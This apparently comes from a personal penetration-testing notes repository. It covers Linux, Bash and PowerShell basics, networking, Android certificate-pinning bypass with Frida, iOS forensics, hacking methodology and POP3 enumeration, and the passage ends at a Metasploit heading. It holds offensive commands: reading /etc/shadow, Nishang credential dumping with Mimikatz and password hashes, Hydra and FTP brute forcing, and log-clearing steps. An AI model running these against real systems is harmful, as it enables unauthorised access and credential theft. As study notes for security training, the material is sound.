-------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | ## Kali 4 | 5 | ## Commands 6 | 7 | ### Sudo Overview 8 | 9 | ```bash 10 | # Run command as root 11 | sudo cat /etc/shadow 12 | # Switch to root user 13 | sudo su - 14 | sudo -i 15 | ``` 16 | 17 | ### Navigating Filesystem 18 | 19 | ```bash 20 | pwd # Print working directory 21 | cd # Change directory 22 | ls # List files and directories 23 | mkdir # Make a directory 24 | touch # Make a file 25 | cp # Copy a file or directory 26 | rm # Remove a file or directory 27 | mv # Move or rename a file or directory 28 | locate # Locat a file or directory 29 | man # Manual pages for a command 30 | ``` 31 | 32 | ### Users and Privileges 33 | 34 | ```bash 35 | d rwx r-x r-w # Directory with permissions 755 36 | - rwx r-- r-- # File with permissions 744 37 | chmod # Change mode of a file or directory 38 | chown # Change owernship of a file or directory 39 | adduser # Adds a new user 40 | passwd # Change the password for a user 41 | su # Switch/substitute to a user 42 | ``` 43 | 44 | ### Network Commands 45 | 46 | ```bash 47 | ifconfig / ip a # Configure a network interface 48 | iwconfig # Configure a wireless network interface 49 | ping # Send ICMP ECHO_REQUEST to network hosts 50 | arp # Resolve IP address to a MAC address 51 | netstat # Print network connections, tables, and statistics 52 | route / ip r # Print routing table 53 | ``` 54 | 55 | ### Installing and Updating Tools 56 | 57 | ```bash 58 | apt update # Updates list of available packages and their versions, but it does not install or upgrade them. 59 | apt upgrade # Actually installs newer versions of the packages you have. 60 | apt install # Install software 61 | git clone # Download software from GitHub or other git provider 62 | ``` 63 | 64 | ### Files 65 | 66 | ```bash 67 | echo "hello" > file.txt # Send/overwrite text to a file 68 | echo "world" >> file.txt # Append text to a file 69 | touch # Create a new file 70 | vim/nano # CLI file editors 71 | gedit # UI file editor 72 | cat # Concatenate files and print on the standard out 73 | ``` 74 | 75 | ## Bash Scripting 76 | 77 | ### Examples 78 | 79 | Print out a variable called `str` which contains the string "Hello World!" 80 | 81 | ```bash 82 | #!/bin/bash 83 | str="Hello World!" 84 | echo $str 85 | 86 | ./hello.sh 87 | ``` 88 | 89 | Print out the number of arguments (`$#`) and then the argument values. 90 | 91 | ```bash 92 | #!/bin/bash 93 | echo $# 94 | echo $1 $2 95 | 96 | ./argtest.sh Hello World 97 | ``` 98 | 99 | Have a user specify an argument number and have it compared against a static argument. 100 | 101 | ```bash 102 | #!/bin/bash 103 | num1="$1" 104 | num2=17 105 | if [ $num1 -ge $num2 ] 106 | then 107 | echo "$num1 is greater than or equal to $num2" 108 | else 109 | echo "$num1 is less than $num2" 110 | fi 111 | echo "Sum is" $(($num1+$num2)) 112 | 113 | ./vartest.sh 19 114 | ``` 115 | 116 | Read input on a newline then reading input again on the same line (`-p`) 117 | 118 | ```bash 119 | #!/bin/bash 120 | echo "What is your name?" 121 | read name 122 | echo "Hello $name" 123 | echo 124 | read -p "Remind me, what is your name again? " name 125 | echo "Hello again $name" 126 | 127 | ./readtest.sh 128 | ``` 129 | 130 | For loop iterating through an array. 131 | 132 | ```bash 133 | #!/bin/bash 134 | names=('Peter' 'Paul' 'Mary' 'David' 'Joe') 135 | x=${#names[@]} 136 | for ((i=0; i<$x; i++)) 137 | do 138 | echo ${names[${i}]} 139 | done 140 | 141 | ./fortest.sh 142 | ``` 143 | 144 | While loop and then an until loop 145 | 146 | ```bash 147 | #!/bin/bash 148 | runs=6 149 | while [ $runs -gt 0 ] 150 | do 151 | echo "Run down at number $runs" 152 | let runs=runs-1 153 | done 154 | until [ $runs -gt 6 ] 155 | do 156 | echo "Run up at number $runs" 157 | let runs=runs+1 158 | done 159 | 160 | ./wutest.sh 161 | ``` 162 | 163 | If else loop checking if a directory exists, and if it does, list its contents. 164 | 165 | ```bash 166 | #!/bin/bash 167 | if [ -d $1 ] 168 | then 169 | echo "$1 exists" 170 | ls $1 171 | else 172 | echo "$1 does not exist." 173 | fi 174 | 175 | ./iftest.sh 176 | ``` 177 | 178 | Using a function, select statement, and case statement to print out a city chosen. 179 | 180 | ```bash 181 | #!/bin/bash 182 | function speak 183 | { if [ $1 = "Paris" ] 184 | then 185 | echo "Language used is French" 186 | elif [ $1 = "Hanoi" ] 187 | then 188 | echo "Language used is Vietnamese, with a little French" 189 | else 190 | echo "Language used is English, of one form or another!" 191 | fi 192 | } 193 | PS3=">" 194 | echo "Let's check the language" 195 | select city in "Paris" "Melbourne" "Toronto" "Seattle" "Hanoi" "exit" 196 | do 197 | if [ $city = "exit" ] 198 | then 199 | break 200 | fi 201 | case $city in 202 | Paris) 203 | echo "City is Paris, France";; 204 | Melbourne) 205 | echo "City is Melbourne, Autstralia";; 206 | Toronto) 207 | echo "City is Toronto, Canada";; 208 | Seattle) 209 | echo "City is Seattle, USA";; 210 | Hanoi) 211 | echo "City is Hanoi, Vietnam";; 212 | esac 213 | speak $city 214 | done 215 | echo "Bye!" 216 | 217 | ./fntest.sh 218 | ``` 219 | 220 | ## Scripts 221 | 222 | ### Ping Sweeper 223 | 224 | #### Ping 225 | 226 | ```bash 227 | # Ping example 228 | ping 192.168.4.29 229 | PING 192.168.4.29 (192.168.4.29) 56(84) bytes of data. 230 | 64 bytes from 192.168.4.29: icmp_seq1 ttl=128 time=0.403 ms 231 | # Send Ping command/reply to a file 232 | ping 192.168.4.29 > ip.txt 233 | # Grab just the IP address from the file 234 | cat ip.txt | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" 235 | ``` 236 | 237 | #### Script to ping the IP addresses specified for the last octet and grabbing only the IPs 238 | 239 | ```bash 240 | #!/bin/bash 241 | 242 | if [ "$1" == "" ] 243 | then 244 | echo "You forgot an IP address!" 245 | echo "Syntax: ./ipsweep.sh 192.168.4" 246 | 247 | else 248 | for ip in `seq 1 254`; do 249 | ping -c 1 $1.$ip | grep "64 bytes" | cut -d " " -f 4 | tr -d ":" & 250 | done 251 | fi 252 | ``` 253 | 254 | #### One Liner executing nmap against IP addresses found 255 | 256 | ```bash 257 | for ip in $(cat ip.txt); do nmap $ip; done 258 | ``` 259 | -------------------------------------------------------------------------------- /misc/networking.md: -------------------------------------------------------------------------------- 1 | # Networking 2 | 3 | ## IP Addresses 4 | 5 | Communicates over Layer 3 (Network) 6 | 7 | ### IPv4 8 | 9 | 32 bit address. 2^32 = 4,294,967,296 (Possible amount of IP addresses). 10 | 11 | #### Example 12 | 13 | ```bash 14 | # Example 1 15 | kali@kali:~$ ifconfig 16 | etho0: flags=4163 mtu 1500 17 | inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255 18 | # Example 2 19 | kali@kali:~$ ip a s 20 | ``` 21 | 22 | ### Classes 23 | 24 | #### Private IP Addresses 25 | 26 | | Network Class | Network Numbers | Network Mask | No. of Networks | No. of Hosts per Network | 27 | | -------------------- | ------------------------------ | ------------- | --------------- | ------------------------ | 28 | | Class A | 10.0.0.0 | 255.0.0.0 | 126 | 16,646,144 | 29 | | Class B | 172.16.0.0 to 172.31.0.0 | 255.255.0.0 | 16,383 | 65,024 | 30 | | Class C | 192.168.0.0 to 192.168.255.255 | 255.255.255.0 | 2,097,151 | 254 | 31 | | Loopback (localhost) | 127.0.0.0 to 127.0.0.7 | 255.255.255.0 | - | - | 32 | 33 | ### NAT (Network Address Translation) 34 | 35 | A technique for letting multiple computers share an IP address. NAT assigns unique addresses to each computer on the local network and adjusts incoming/outgoing network traffic to send data to the right place. 36 | 37 | ### IPv6 38 | 39 | 128 bit address. 2^128 = 3.4028236692093846346337460743177e+38 (Possible amount of IP addresses) 40 | 41 | #### Example 42 | 43 | ```bash 44 | # Example 1 45 | kali@kali:~$ ifconfig 46 | etho0: flags=4163 mtu 1500 47 | inet6 fe80::20c:29ff:fe0a:4205 prefixlen 64 scopeid 0x20 48 | # Example 2 49 | kali@kali:~$ ip a s 50 | ``` 51 | 52 | ## MAC Addresses 53 | 54 | Communicates over Layer 2 (Data Link) 55 | 56 | 48 bit address. Two halves: the first 24 bits form the Organizationally Unique Identifier (OUI) and the last 24 bits form a serial number (formally called an extension identifier). 57 | 58 | A media access control address (MAC address) is a unique identifier assigned to a network interface controller (NIC) for use as a network address in communications within a network segment. 59 | 60 | #### Example 61 | 62 | ```bash 63 | # Example 1 64 | kali@kali:~$ ifconfig 65 | etho0: flags=4163 mtu 1500 66 | ether 00:0c:29:0a:42:05 txqueuelen 1000 (Ethernet) 67 | # Example 2 68 | kali@kali:~$ ip a s 69 | ``` 70 | 71 | ## TCP, UDP, and the Three-Way Handshake 72 | 73 | ### TCP 74 | 75 | Transmission Control Protocol. Connection oriented. 76 | 77 | #### Three-Way Handshake 78 | 79 | 1. \*\*SYN \*\*- Client sends a SYNchronize packet to the server. 80 | 2. \*\*SYN-ACK \*\*- Server sends back a SYNchronize-ACKnowledgement to the client. 81 | 3. \*\*ACK \*\*- Client sends an ACKnowledge to the server. 82 | 83 | ### UDP 84 | 85 | User Datagram Protocol. Connectionless. No handshake takes place. 86 | 87 | ## Common Ports and Protocols 88 | 89 | {% tabs %} 90 | {% tab title="TCP" %} 91 | * 21 (FTP) 92 | * 22 (SSH) 93 | * 23 (Telnet) 94 | * 25 (SMTP) 95 | * 53 (DNS) 96 | * 80/443 (HTTP/S) 97 | * 110 (POP3) 98 | * 139+445 (SMB) 99 | * 143 (IMAP) 100 | {% endtab %} 101 | 102 | {% tab title="UDP" %} 103 | * 53 (DNS) 104 | * 67, 68 (DHCP) 105 | * 69 (TFTP) 106 | * 161 (SNMP) 107 | {% endtab %} 108 | {% endtabs %} 109 | 110 | ## The OSI Model 111 | 112 | | Layer | Layer Name | Examples | Description | 113 | | ----- | ------------------ | ----------------------- | ----------------------------------------------------------------------------------- | 114 | | 7 | Application Layer | HTTP, SMTP, DNS, | Human computer interaction layers where application can access the network services | 115 | | 6 | Presentation Layer | WMV, JPEG, MOV, | Ensures that data is in a usable format and is where data encryption occurs | 116 | | 5 | Session Layer | Session management, | Maintains connections and is responsible for controlling ports and sessions | 117 | | 4 | Transport Layer | TCP, UDP, | Transmits data using transmission protocols including TCP and UDP | 118 | | 3 | Network Layer | IP addresses, routing, | Decides which physical path the data will take | 119 | | 2 | Data Link Layer | Switching, MAC address, | Defines the format of data on the network | 120 | | 1 | Physical Layer | Data cables, cat6, | Transmits raw bit stream over the physical medium | 121 | 122 | #### Mnemonic 123 | 124 | * PDNTSPA 125 | * Please Do Not Throw Sausage Pizza Away 126 | 127 | #### Troubleshooting 128 | 129 | * Typically start with layer 1 and work your way to layer 7 130 | 131 | ## Subnetting 132 | 133 | TBD 134 | -------------------------------------------------------------------------------- /misc/note-taking.md: -------------------------------------------------------------------------------- 1 | # Note Taking 2 | 3 | ## Note Taking Tools 4 | 5 | * KeepNote 6 | * OneNote 7 | * CherryTree 8 | * Joplin 9 | 10 | ## Screenshot Tools 11 | 12 | * Greenshot 13 | * Flameshot 14 | -------------------------------------------------------------------------------- /misc/powershell.md: -------------------------------------------------------------------------------- 1 | # PowerShell 2 | 3 | ## Examples 4 | 5 | ### Commands 6 | 7 | ```powershell 8 | Get-Verb # List available verbs 9 | (Get-Verb).count # Get the count of command output 10 | help push # Get help on a specific verb 11 | help pushd # Get additional help from previous command output 12 | hostname > direct.txt # Redirect output to a file 13 | dir >> direct.txt # Append output to a file 14 | type direct.txt # Read out file to the console 15 | cat direct.txt # Another way to read out file to the console 16 | Get-Process # Get running processes 17 | echo "Hello World" # Send Hello World to the console 18 | Write-Host "Hello World" # Send Hello World to the console 19 | ``` 20 | 21 | ### Variables 22 | 23 | ```powershell 24 | $name = 'Erich' 25 | $number = 42 26 | $nlist = 1,3,5,7,11,13 27 | ($nlist).count 28 | echo "The list is $nlist" 29 | ``` 30 | 31 | ### If Statements 32 | 33 | ```powershell 34 | if ($nlist[1] -gt 0) 35 | { 36 | echo "Positive" 37 | } 38 | ``` 39 | 40 | ### Loops 41 | 42 | ```powershell 43 | $i = 1 44 | do { 45 | $val = $nlist | Select-Object -Index $i 46 | echo "Value is $val" 47 | $i = $i + 1 48 | } while ($i -le ($nlist).count) 49 | ``` 50 | 51 | ```powershell 52 | ForEach ($val in $nlists) 53 | { echo "Value is $val" 54 | } 55 | ``` 56 | 57 | ## Nishang 58 | 59 | ```powershell 60 | # Pre-req 61 | Set-ExecutionPolicy Unrestricted 62 | gci c:\nishang\ -recurse | Unblock-File 63 | Import-Module .\nishang.psm1 64 | # Example commands 65 | Get-Command -Module nishang 66 | Get-Information > info.txt 67 | Get-Help Invoke-Mimikatz -full 68 | Get-Passhashes 69 | Invoke-PortScan -startaddress 10.0.2.1 -endaddress 10.0.2.8 -ScanPort 70 | Out-Word -Paload "powershell.exe -ExecutionPolicy Bypass -noprofile" 71 | Invoke-BruteForce 10.0.2.8 -service FTP -userlist users.txt -passwordlist passes.txt -verbose -StopOnSuccess 72 | Invoke-Prasadhak # Requries API key from Virus Total 73 | ``` 74 | -------------------------------------------------------------------------------- /misc/todo.md: -------------------------------------------------------------------------------- 1 | # TODO 2 | 3 | ## Checklist 4 | 5 | ### HTB 6 | 7 | #### ippsec videos / ippsec.rocks 8 | 9 | * [ ] Timelapse 10 | * [ ] ... 11 | 12 | #### Rana, oxdf, other writeups 13 | 14 | ### THM 15 | 16 | #### Service Enumeration 17 | 18 | -------------------------------------------------------------------------------- /mobile/android/support-and-tools.md: -------------------------------------------------------------------------------- 1 | # Support and Tools 2 | 3 | ## Notes 4 | 5 | ### OS Versions 6 | 7 | * Android 6 - Device does not need to be rooted 8 | * Android 7.1 - Device needs to be rooted before it will accept the burp cert 9 | 10 | ### Certificate Pinning 11 | 12 | ## Setup 13 | 14 | ### Frida Server 15 | 16 | Find out the arch version of the device 17 | 18 | `adb shell getprop ro.product.cpu.abi` 19 | 20 | Download the Frida server version from the following URL and extract it 21 | 22 | * https://github.com/frida/frida/releases/ 23 | * frida-server-xxxx-android-x86.xz 24 | * frida-server-xxxx-android-x86\_64.xz 25 | * Windows: `adb push C:\ADB\ /data/local/tmp` 26 | * Linux: `adb push ADB/ /data/local/tmp` 27 | * Both: `adb shell chmod 777 /data/local/tmp/` 28 | 29 | ### Burp 30 | 31 | 1. Open Burp and go to Proxy tab 32 | 2. Select Options tab 33 | 3. Click the Import/Export CA Certificate 34 | 4. Export Certificate in DER format 35 | 5. Push the Certificate onto the device with ADB (We will need this later for Frida) 36 | 1. `adb push cacert.der /data/local/tmp/cert-der.crt` 37 | 38 | ### SSL Pinning 39 | 40 | Script that will be used to overwrite the certificate pinning mechanism 41 | 42 | [https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/](https://codeshare.frida.re/@pcipolloni/universal-android-ssl-pinning-bypass-with-frida/) 43 | 44 | #### Script injection to bypass certificate pinning 45 | 46 | * Push the script onto the device 47 | * `adb push C:\ADB\fridascriptjs /data/local/tmp` 48 | * Check and run Frida server on the device 49 | * `adb shell /data/local/tmp/ &` 50 | * List all the running processes on the device 51 | * `frida-ps -U` 52 | * Locate your applications package name from the list 53 | * i.e. 3672 com.twitter.android 54 | * Hook Frida script into your application 55 | * `frida -U -f com.twitter.android -l --no-paus` 56 | 57 | #### Why we need certificate pinning bypass 58 | 59 | * Mobile apps encrypt traffic for HTTPS which uses a certificate to do this 60 | * We can insert Burp certificate into Android to capture requests 61 | * Developer protection: Certificate pinning 62 | * App checks to make sure only it's own cert can encrypt traffic 63 | * Our Solution: Certificate pinning bypass 64 | * Overwrite the code in the API that's responsible for check cert 65 | * Frida 66 | 67 | ## Tools 68 | 69 | * ADB (Android Debug Bridge) 70 | * jadx 71 | * dex2jar 72 | * Frida 73 | * Burpsuite 74 | * Genymotion 75 | * Android Studio Virtual Device Manager 76 | -------------------------------------------------------------------------------- /mobile/ios/README.md: -------------------------------------------------------------------------------- 1 | # iOS 2 | 3 | -------------------------------------------------------------------------------- /mobile/ios/ios-forensics.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: https://tryhackme.com/room/iosforensics 3 | --- 4 | 5 | # iOS Forensics 6 | 7 | ## What is Digital Forensics and How is it Used Today? 8 | 9 | Digital forensics is the mere digitization of the traditional use and applications of forensic investigation, for example, within police departments after a crime has been committed. 10 | 11 | Artefacts such as blood, fingerprints or hair fibers are used in criminal investigations to paint a picture of the events that took place and who was involved. Digital forensics is the same collection of artefacts, however, these artefacts being events on a digital device. 12 | 13 | Removing evidence or covering your tracks is a fallacy to some extent - especially with digital devices. Someone may be able to hide exactly what they were doing, however, the act of hiding this will, in turn, leave the trace of _something_ behind hidden. 14 | 15 | ## Problems Facing Digital Forensics Analysts 16 | 17 | ### Time Consumption & Resources 18 | 19 | Digital forensics is, without doing it justice, an incredibly time-consuming process. Despite the toolkits and suites available, you find yourself having to analyze data bit-by-bit to find that one smoking gun. Now extend that to a 1TB drive - not so fun huh. 20 | 21 | With the very nature of forensic images being exact bit-for-bit copies of an acquired device or system, you need to have the facilities to be able to store this data before it can be processed. Take a file server full of data with 10 terabytes of data. You need 10 terabytes to store that on as well, slapping on another 10 terabytes required for the backups of the image that you make; suddenly you have at least 20 terabytes sitting around. 22 | 23 | ### Understanding the Person 24 | 25 | As a forensic analyst, you have to piece various parts of information together, into a formal and well-documented timeline of events for presentation. For example, if you were to try to find a bit of text in a document on your computer, you'd know where to go. Now take away the desktop/GUI and terminal then ask your friend to try and find it through the means similar to the screenshot in Task 2. Pretty hard huh? 26 | 27 | ### Encryption 28 | 29 | As it stands, an effective and secure implementation of encryption poses as one of the biggest hurdles to forensic analysts. The problem mostly? People and/or devices themselves leave the decryption keys within the same platform. Such as in the case of the iPhone you are going to analyse. After all, it's that catch-22 of a complex password is a strong password until you need to write it down. 30 | 31 | ### Steganography 32 | 33 | We all know (and love) steganography here; Hiding data within data. And in some cases, is more secure then cryptography; seeing as cryptography makes the contents unreadable, steganography masquerades the entire existence of this data altogether. 34 | 35 | ### Cost of Entry 36 | 37 | Sure, you can pick up FTK Imager lite or Autopsy for free, but these tool suites - whilst being lifesavers, are only the tip of the iceberg in digital forensics. 38 | 39 | For example, you're not going to be creating any file system images of iPhones in FTK Imager lite, and if so, you're going through it bit-for-bit if it is at all unencrypted. 40 | 41 | Enter infamous companies such as Cellebrite. This company are arguably the forefront of data acquisition. Costing approximately $15,000 for the equipment and adapters, specialist kits such these aren't available to hobbyists - only to law enforcement, government agencies and specific Universities. Cellebrite was used to dump this iPhone. 42 | 43 | Let alone the cost of purchasing sophisticated tools, there is a heavy expectation of certifications and even degrees; that's what filled most of my 3 years at University! 44 | 45 | ## iOS File Systems 46 | 47 | Apple, in their notorious way of doing things, have created their own sets of file system formattings: AFS and HFS+ 48 | 49 | Starting with the oldest, HFS+ or Mac OS Extended is the legacy file system used by Apple all the way in 1998 and is still supported today. The issue being that HFS was not future proof - given the fact it cannot support file timestamps past February 6th, 2040 (Vigo., 2018). 50 | 51 | Whilst HFS+ didn't support encryption at its entirety (a win in our books as forensic analysts) any device such as iMac or iPhone past iOS 10.3 will have had their file system converted from HFS+ to AFS automatically. 52 | 53 | AFS or Apple File System (creative right...!) boasts many features, including full disk encryption, worrisome for analysts considering all devices past iOS 10.3 will have this system structure. But from a design point of view, AFS introduces smarter data management such as in the screenshot below, where a file requiring 3 blocks worth of space when copied, would require another 3 blocks again. 54 | 55 | Instead of writing and storing the entire data again (taking up six blocks in our example), AFS simply creates another reference to the file (only taking up a total of four blocks in our example), similar to `inodes` in Linux. 56 | 57 | ## Modern iOS Security 58 | 59 | Throughout the years of design, Apple's operating system for its iOS devices has ten-folded in measure of protecting their user's data. So much so, companies have made their reputation purely by being the ones who can unlock iPhones. The ability to do so for law enforcement / governmental authorities is a sprint race behind very, very closed doors. 60 | 61 | For example, Elcomsoft recently announced being able to acquisition file system data from iPhones running iOS 13 and 13.3 without any jailbreaking. That in of itself is groundbreaking in mobile device forensics. And that's only what we've been told about! 62 | 63 | But We're Average Joes Here. We can't be paying thousands for bits of kit and licensing. Nor do we have the space to carry every phone adapter from Nokia's to A or Micro-B cables. 64 | 65 | You might be thinking, but surely with all of the security measures iPhones have these days such as Touch-ID and Face ID on top of the passcode, your data is safe, right? 66 | 67 | Well, toolkits such as this UFED can use all of the acquisition methods that we discussed in task 8. However, what's worth noting is that the UFED is capable of forcing the iDevice to boot using UFED's custom boot loader, bypassing the entire iOS operating system - similar to rooting an android; resulting in an entire dump of the entire device. The issue with this? It contradicts the golden rule of digital forensics: Never turn it off. 68 | 69 | People often install "panic switches" into devices, where a shutdown event could trigger an entire wiping of the device. Or in the case of iPhones, if the iPhone isn't properly isolated, it can be remotely wiped via the iCloud - a very true story. 70 | 71 | iOS' "Restricted Mode" 72 | 73 | Since 2018, Apple enforced a "Restricted Mode" on all iDevices running that version and above. This feature disables the input/output of data functionality from the lightning (charge) cable until the iPhone is unlocked with a passcode. Devices must be trusted before any data can be written - or so as by design. 74 | 75 | ## Data Acquisition & Trust Certificates 76 | 77 | ## Looking for Loot! 78 | 79 | ## Analyzing iOS Files 80 | -------------------------------------------------------------------------------- /mobile/tcm-mobile/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: https://academy.tcm-sec.com/courses/enrolled/1557555 3 | --- 4 | 5 | # TCM - Mobile 6 | 7 | ## Introduction and Course Resources 8 | 9 | ### Course Resources 10 | 11 | * [OWASP Mobile Application Pentesting GitBook](https://mobile-security.gitbook.io/mobile-security-testing-guide/overview/0x03-overview) 12 | * [OWASP Mobile Top 10](https://owasp.org/www-project-mobile-top-10/) 13 | * [SecJuice Intro to Frida & Objections](https://www.secjuice.com/objection-frida-guide/) 14 | * iOS Research and Exploration: Volume I by James Duffy 15 | * [HackTricks Checklist (Android)](https://book.hacktricks.xyz/mobile-pentesting/android-checklist) 16 | * [HackTricks Checklist (iOS)](https://book.hacktricks.xyz/mobile-apps-pentesting/ios-pentesting-checklist) 17 | 18 | ### Mobile Pentesting Certification Landscape 19 | 20 | #### Certifications / Courses 21 | 22 | * [eLearnSecurity Mobile Application Penetration Tester](https://elearnsecurity.com/product/emapt-certification/) 23 | * [SANS Institute GMOB (GIAC Certified Device Security Analyst)](https://www.giac.org/certifications/mobile-device-security-analyst-gmob/) 24 | * [EC-Council](https://www.eccouncil.org/hands-on-android-security/) 25 | * [Infosec Institute](https://www.infosecinstitute.com/skills/learning-paths/certified-mobile-and-web-app-penetration-tester-cmwapt/) 26 | 27 | ## Penetration Testing Process 28 | 29 | ### The Penetration Testing Process 30 | 31 | 1. Reconnaissance 32 | 1. Active - Physical recon, interacting with targets via social engineering, anything with a "hands-on" the target approach 33 | 2. Passive - using tools like LinkedIn, Google, publicly available info to enumerate the target 34 | 2. Scanning/Enumeration 35 | 1. Using tools that touch the target's physical or digital infrastructure to enumerate vulnerabilities or open ports, etc. 36 | 1. Example: nmap, dirb, nikto 37 | 3. Exploitation 38 | 1. Taking advantage of the vulnerabilities that you discovered through enumeration and recon 39 | 4. Privilege Escalation 40 | 1. Once inside of the system or environment, moving laterally or vertically to obtain more access 41 | 1. Lateral - from device or app to another device or app as the same user 42 | 2. Vertical - from low level user account to a higher level account 43 | 5. Cover Your Tracks 44 | 1. Eliminating evidence that may incriminate you, or leave signs of exploitation 45 | 2. Changing time stamps, erasing video footage, etc. 46 | 6. Reporting 47 | 1. The result of all your hard work, outlining the findings and exploits to the company to allow them to fix them 48 | 2. This is what separates us from the bad guys 49 | 50 | ### The Mobile Application Penetration Testing Process 51 | 52 | 1. Reconnaissance 53 | 1. Find information about the company 54 | 1. Earnings Reports and Press Releases often contain info about Mobile Apps 55 | 2. Find the Target App on the Play Store or Apple Store 56 | 1. Read reviews 57 | 2. Enumerate who created the app 58 | 3. Enumerate the different app versions and patch notes 59 | 4. Enumerate the company's other apps 60 | 2. Static Analysis 61 | 1. Reading the Application Code via manual or automated tools to access the security 62 | 1. Looking for hardcoded strings, security misconfigurations, or additional targets extracted from the app 63 | 2. Static Analysis will sometimes results in the Pentesting Process being triggered, especially additional enumeration or fingerprinting 64 | 1. Find a URL - recon, enumerate, exploit, etc. 65 | 1. Many companies use other API gateways/path for mobile apps vs the traditional website 66 | 2. Find an email/username - recon using phonebook.cz, etc. 67 | 3. Find a storage bucket - recon, enumerate with cloud\_enum 68 | 3. Dynamic Analysis 69 | 1. Running the application and manipulating it 70 | 1. Intercepting traffic with proxies like Burp Suite/Proxyman 71 | 2. Dumping memory from the application to check for insecurely stored secrets 72 | 3. Checking local storage for files created at runtime 73 | 4. Breaking SSL Pinning at Runtime 74 | 2. Dynamic Analysis can often result in attacks related to the OWASP Top Ten 75 | 1. SQL Injection, Cross-Site Scripting, IDOR, XXE, etc. 76 | 1. Note on XSS: you often will not get XSS in the mobile app itself, but sometimes this can affect the full version of the website. 77 | 4. Reporting 78 | 1. Often contains executive summary as well as specific vulnerabilities discovered 79 | 2. Write report with both OWASP Top Ten (Web) and OWASPT Top Ten (Mobile) in mind 80 | 3. Provide business with the criticality as well as steps to reproduce 81 | 4. Remember to mention the positive security implementations 82 | -------------------------------------------------------------------------------- /penetration-testing-methodology/5-stages-of-ethical-hacking.md: -------------------------------------------------------------------------------- 1 | # 5 Stages of Ethical Hacking 2 | 3 | ## 5 Stages of Ethical Hacking 4 | 5 | ### Reconnaissance 6 | 7 | #### AKA Footprinting 8 | 9 | * Finding out specific IP addresses, TCP & UDP services, Identifies vulnerabilities 10 | * Network, Host, People involved 11 | 12 | #### Active 13 | 14 | Directly interacting with the target to gather information about the target. 15 | 16 | #### Passive 17 | 18 | Trying to collect the information about the target without directly accessing the target. To this purpose, hacker can use social media, public websites etc. 19 | 20 | ### Scanning (& Enumeration) 21 | 22 | Nmap, Nessus, Nikto, etc. 23 | 24 | 1. **Pre-attack** - Hacker scans the network for specific information based on the information gathered during reconnaissance. 25 | 2. **Port scanning** - This phase involves scanning the target for the information like open ports, live systems, various services running on the host. 26 | 3. **Vulnerability Scanning** - Checking the target for weaknesses or vulnerabilities which can be exploited. Usually done with help of automated tools 27 | 4. **Network Mapping/Information Extraction** - Finding the topology of network, routers, firewalls servers if any, and host information and drawing a network diagram with the available information. This map may serve as a valuable piece of information throughout the hacking process. 28 | 29 | ### Gaining Access (Exploitation) 30 | 31 | This phase is where an attacker breaks into the system/network using various tools or methods. After entering into a system, he has to increase his privilege to administrator level so he can install an application he needs or modify data or hide data. 32 | 33 | #### Examples 34 | 35 | * Phishing, MitM, Brute Force, Spoofing, DoS, BOF, Session Hijacking, BEC 36 | 37 | ### Maintaining Access 38 | 39 | Hacker may just hack the system to show it was vulnerable or he can be so mischievous that he wants to maintain or persist the connection in the background without the knowledge of the user. This can be done using Trojans, Rootkits or other malicious files. The aim is to maintain the access to the target until he finishes the tasks he planned to accomplish in that target. 40 | 41 | ### Clearing Tracks 42 | 43 | No thief wants to get caught. An intelligent hacker always clears all evidence so that in the later point of time, no one will find any traces leading to him. This involves modifying/corrupting/deleting the values of Logs, modifying registry values and uninstalling all applications he used and deleting all folders he created. 44 | 45 | #### Examples 46 | 47 | * Clearing the cache and cookies 48 | * Modifying registry values 49 | * Modifying/corrupting/deleting the values of Logs 50 | * Clearing out Sent emails 51 | * Closing all the open ports 52 | * Uninstalling all applications that he/she be used 53 | -------------------------------------------------------------------------------- /penetration-testing-methodology/the-cyber-kill-chain.md: -------------------------------------------------------------------------------- 1 | # The Cyber Kill Chain 2 | 3 | ## 7 Stages 4 | 5 | 1. Reconnaissance 6 | 2. Weaponization 7 | 3. Delivery 8 | 4. Exploitation 9 | 5. Installation 10 | 6. Command and control 11 | 7. Actions 12 | 13 | ### Reconnaissance 14 | 15 | * Cyber equivalent of "casing the joint" 16 | * IP address scan of the business domain 17 | * Port scan of active hosts 18 | * Identify vectors for attack 19 | * Checking software versions 20 | * Automated scanning to scale the attack -- botnets 21 | 22 | ### Weaponization 23 | 24 | * Customize a vulnerability to a target 25 | * Integrate into a cyberattack platform 26 | * Purchased ready to run 27 | 28 | ### Delivery 29 | 30 | * Email attachment 31 | * Compromised website 32 | * Log into the target 33 | * Default credentials 34 | * Stolen credentials 35 | * Internet-exposed vulnerability 36 | * Flash drive 37 | 38 | ### Exploitation 39 | 40 | * Exploit a vulnerability 41 | * Unauthorized use of credentials 42 | * Unaware execution of malware 43 | 44 | ### Installation 45 | 46 | * Install payload into memory or disk 47 | * Execute payload after system restart 48 | * Provides ongoing access 49 | 50 | ### Command and Control 51 | 52 | * Connect to the command and control server 53 | * Receive commands 54 | * List subdirectories and files 55 | * Extract a named file 56 | * Modify or replace software 57 | * Determine the command and control server address 58 | 59 | ### Actions 60 | 61 | * Action 62 | * Deface website 63 | * Steal sensitive information 64 | * Access a bank account 65 | -------------------------------------------------------------------------------- /pentesting-network/110-pop3.md: -------------------------------------------------------------------------------- 1 | # 110 (POP3) 2 | 3 | ## Enumeration 4 | 5 | ### Checks 6 | 7 | * [ ] Check version for exploits 8 | * [ ] Check mails for the presence of credentials 9 | 10 | ### Banner Grabbing 11 | 12 | ```bash 13 | nc -nv 110 14 | telnet 110 15 | openssl s_client -connect :995 -crlf -quiet 16 | ``` 17 | 18 | ### nmap 19 | 20 | ```bash 21 | nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port # All are default scripts 22 | ``` 23 | 24 | ## Commands 25 | 26 | ``` 27 | USER uid Log in as "uid" 28 | PASS password Substitue "password" for your actual password 29 | STAT List number of messages, total mailbox size 30 | LIST List messages and sizes 31 | RETR n Show message n 32 | DELE n Mark message n for deletion 33 | RSET Undo any changes 34 | QUIT Logout (expunges messages if no RSET) 35 | TOP msg n Show first n lines of message number msg 36 | CAPA Get capabilities 37 | ``` 38 | 39 | ## Brute Force 40 | 41 | ### Hydra 42 | 43 | ```bash 44 | hydra -l -P /path/to/passwords.txt -f pop3 -V 45 | hydra -S -v -l -P /path/to/passwords.txt -s 995 -f pop3 -V 46 | ``` 47 | 48 | ### Metasploit 49 | 50 | ```bash 